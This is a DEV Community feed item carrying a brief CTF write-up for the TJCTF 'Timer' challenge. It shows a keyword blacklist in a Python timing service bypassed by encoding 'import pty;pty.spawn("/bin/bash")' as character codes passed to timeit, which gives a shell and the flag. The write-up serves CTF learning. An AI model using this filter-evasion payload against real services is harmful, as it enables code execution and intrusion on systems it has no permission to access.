DEV Community: Cheuk Yin Ng The latest articles on DEV Community by Cheuk Yin Ng (@csys). https://dev.to/csys https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F236630%2Fa95ba5c0-b88a-423c-8da4-fb36ccdc7f35.jpeg DEV Community: Cheuk Yin Ng https://dev.to/csys en Timer - tjctf Cheuk Yin Ng Wed, 27 May 2020 03:48:40 +0000 https://dev.to/csys/timer-tjctf-2bmb https://dev.to/csys/timer-tjctf-2bmb <p>This one is a cool blacklist bypass. It's pretty simple. You are presented a text interface asking you to enter a python command.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">Type a command to time it! </span></code></pre> </div> <p>Trying some simple functions seem to work fine, but....<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">Type a command to time it! print(1) Runtime: 1.09672546387e-05 Type a command to time it! import os Hey, no hacking! </span></code></pre> </div> <p>...there seems to be a blacklist of characters that get screened before the command is run. We must obfuscate it somehow. By digging around, we can see exactly what is in the blacklist and what isn't in the blacklist. Most peculiarly, <code>timeit</code> is <strong>NOT</strong> in the blacklist.</p> <blockquote> <p>Sidenote: it is hinted that <code>timeit</code> could be a possibility because it is visible in the source whenever we provide invalid python code for the program to execute.<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">Type a command to time it! arst Traceback (most recent call last): </span><span class="gp"> File "/timed.py", line 36, in &lt;module&gt;</span><span class="w"> </span><span class="go"> time1=t.timeit(1) File "/usr/lib/python2.7/timeit.py", line 202, in timeit timing = self.inner(it, self.timer) </span><span class="gp"> File "&lt;timeit-src&gt;</span><span class="s2">", line 6, in inner </span><span class="go"> arst NameError: global name 'arst' is not defined Runtime: 0 Type a command to time it! 12.,, Traceback (most recent call last): </span><span class="gp"> File "/timed.py", line 31, in &lt;module&gt;</span><span class="w"> </span><span class="go"> t=timeit.Timer(res) File "/usr/lib/python2.7/timeit.py", line 129, in __init__ compile(setup + '\n' + stmt, dummy_src_name, "exec") </span><span class="gp"> File "&lt;timeit-src&gt;</span><span class="s2">", line 2 </span><span class="go"> 12.,, ^ SyntaxError: invalid syntax </span></code></pre> </div> <p>We can do something like the following in order to trick the program into executing blacklisted commands:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># We want to execute the following python </span><span class="n">want_exec</span> <span class="o">=</span> <span class="s">'import pty;pty.spawn("/bin/bash")'</span> <span class="c1"># So we obfuscate it a bit </span><span class="n">obfuscated</span> <span class="o">=</span> <span class="p">[</span><span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">want_exec</span><span class="p">]</span> <span class="c1"># and we can just reverse it using a join-map </span><span class="k">assert</span> <span class="n">want_exec</span> <span class="o">==</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="nb">map</span><span class="p">(</span><span class="nb">chr</span><span class="p">,</span> <span class="n">obfuscated</span><span class="p">))</span> <span class="c1"># Payload: </span><span class="n">timeit</span><span class="p">(</span><span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="nb">map</span><span class="p">(</span><span class="nb">chr</span><span class="p">,</span> <span class="p">[</span><span class="mi">105</span><span class="p">,</span> <span class="p">...])))</span> </code></pre> </div> <p>By pasting the payload into the program, we get a shell:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">Type a command to time it! timeit(''.join(map(chr, [105, ...]))) bash: /root/.bashrc: Permission denied </span><span class="gp">nobody@c51f99923c23:/$</span><span class="w"> </span><span class="nb">ls</span> <span class="go">ls bin dev flag.txt lib media opt root sbin sys tmp var boot etc home lib64 mnt proc run srv timed.py usr </span><span class="gp">nobody@c51f99923c23:/$</span><span class="w"> </span><span class="nb">cat </span>flag.txt <span class="go">cat flag.txt tjctf{iTs_T1m3_f0r_a_flaggg} </span></code></pre> </div> security ctf